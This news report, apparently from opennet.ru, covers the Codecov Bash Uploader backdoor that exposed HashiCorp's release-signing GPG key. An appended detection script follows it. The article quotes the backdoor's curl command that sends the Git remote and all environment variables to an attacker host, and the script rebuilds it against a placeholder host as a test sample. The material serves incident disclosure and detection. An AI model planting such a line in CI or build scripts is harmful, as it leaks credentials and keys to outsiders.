Injection of malicious code into the Codecov script led to the compromise of the HashiCorp PGP key

HashiCorp, known for developing the open-source tools Vagrant, Packer, Nomad and Terraform, has announced the leak of the private GPG key used to create the digital signatures that verify its releases. Attackers who gained access to the GPG key could potentially make hidden changes to HashiCorp products by certifying them with a digital signature. At the same time, the company stated that its audit found no traces of attempts to make such modifications.

The compromised GPG key has now been revoked and a new key has been introduced in its place. The problem affected only verification using the SHA256SUM and SHA256SUM.sig files. It did not affect the generation of digital signatures for the Linux DEB and RPM packages supplied through releases.hashicorp.com, nor the release verification mechanisms for macOS and Windows (AuthentiCode).

The leak occurred because the infrastructure used the Codecov Bash Uploader (codecov-bash) script, which is designed to upload reports from continuous integration systems. During the attack on the Codecov company, a backdoor was hidden in this script, through which passwords and encryption keys were sent to the attackers' server.

To carry out the compromise, the attackers took advantage of an error in the process of building the Codecov Docker image, which allowed them to extract the credentials for GCS (Google Cloud Storage) needed to modify the Bash Uploader script distributed from the codecov.io website. The changes were made back on January 31, went undetected for two months, and allowed the attackers to extract information stored in customers' continuous integration environments. Using the added malicious code, the attackers could obtain information about the Git repository under test and all environment variables, including the tokens, encryption keys and passwords passed to continuous integration systems to provide access to application code, repositories and services such as Amazon Web Services and GitHub.

Besides being called directly, the Codecov Bash Uploader script was used as part of other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, whose users are also affected by the problem. All users of codecov-bash and related products are advised to audit their infrastructure and to change their passwords and encryption keys. You can check whether a copy of the script contains the backdoor by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
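
The check described above can be run over local or cached copies of the uploader. The shell functions below are an added example, not code from Codecov, HashiCorp or the source article; the function names, the two sample scripts and the placeholder host are assumptions made for illustration, and the pattern keys on the "$(env)" payload and the /upload/v2 path because the article omits the host.

```shell
#!/bin/sh
# Added example, not Codecov or HashiCorp code.
# Indicator from the article: a curl call whose -d payload embeds "$(env)"
# and whose target path is /upload/v2. The host is not matched, because the
# article omits it.
EXFIL_RE='curl[[:space:]].*-d[[:space:]].*\$\(env\).*/upload/v2'

# has_env_exfil FILE -> 0 indicator found (prints line:text), 1 absent,
# 2 file missing or unreadable.
has_env_exfil() {
  [ -r "$1" ] || return 2
  grep -nE "$EXFIL_RE" "$1"
}

# count_flagged DIR -> prints how many files under DIR carry the indicator
# (for sweeping CI caches or vendored copies of the uploader).
count_flagged() {
  grep -rlE "$EXFIL_RE" "$1" 2>/dev/null | wc -l | tr -d ' '
}

# make_samples -> prints a temp dir holding two constructed scripts.
make_samples() {
  d=$(mktemp -d) || return 1
  # Constructed stand-in for an untampered uploader: sends a report file only.
  cat > "$d/clean.sh" <<'EOF'
#!/bin/sh
curl -sS -X POST --data-binary @coverage.xml "https://codecov.example/upload/v2"
EOF
  # Constructed tampered copy: the article's line with a placeholder host.
  cat > "$d/tampered.sh" <<'EOF'
#!/bin/sh
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://PLACEHOLDER.invalid/upload/v2 || true
curl -sS -X POST --data-binary @coverage.xml "https://codecov.example/upload/v2"
EOF
  echo "$d"
}

samples=$(make_samples)
for f in "$samples"/*.sh; do
  if has_env_exfil "$f" >/dev/null; then echo "FLAGGED $f"; else echo "clean   $f"; fi
done
echo "flagged files: $(count_flagged "$samples")"
rm -rf "$samples"
```

A hit means the environment of every CI job that ran that copy should be treated as disclosed, so the secrets it held need rotating, as the article recommends.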

Source: opennet.ru
